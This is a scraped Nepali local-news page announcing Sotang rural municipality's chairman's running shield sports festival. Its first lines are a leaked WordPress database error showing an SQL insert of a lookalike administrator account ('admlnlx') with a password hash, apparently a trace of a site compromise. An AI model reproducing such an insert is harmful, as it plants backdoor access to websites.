WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bp0T3JbhudkOmDbCM37O5k0E/K0Bws0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 11:41:04', '', 'admlnlx', 'admlnlx')

सोताङ गाउपालिकाले अध्यक्ष रनिङ शिल्ड आयोजना गर्ने – Gaule Khabar

सोताङ गाउपालिकाले अध्यक्ष रनिङ शिल्ड आयोजना गर्ने

सोताङ गाउपालिकाले अध्यक्ष रनिङ शिल्ड आयोजना गर्ने

गाउँले न्यूज, २३ पौष । सोताङ गाउपालिकाले अध्यक्ष रनिङ शिल्ड तथा बृहत खेलकुद महोत्सब आयोजना गर्ने भएको छ ।

२०७५ पौष २४ देखी २८ गते सम्म सोताङ गाउपालिकको केन्द्र सोताङमा आयोजना हुने खेलकुद महोत्सबमा गाउपालिका भरिका वडा स्तरिय महिला पुरुष भलिबल, ब्याटमिन्टन, गाउपालिका भरिका आधारभूत स्तरिय छोटो दौड, छात्र छात्रा महिला पुरुष भलिबल, मा. वि. स्तरिय हाजिरिजवाफ, हाइजम्प, लङ्जम्, सट्फुट, ज्याप्लिङ थ्रो, प्राबी स्तरिय निर्त्या प्रतियोगिताको आयोजना हुने भएको छ ।

खेलकुदको माध्यमबाट समाजमा आपसी सद्भाव र सहिस्णुता तथा आपसी हार्दिकतालाई कायम राख्दै युवमा रहेको खेल प्रतिभालाई उजागर गदै स्ठानिया तह¸ जिल्ला, प्रदेश र राष्टिया तथा अन्तराष्टिया खेलाडी उत्पादनमा बिशेष टेव पुर्‍यउने आयोजकको लक्ष रहेको जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका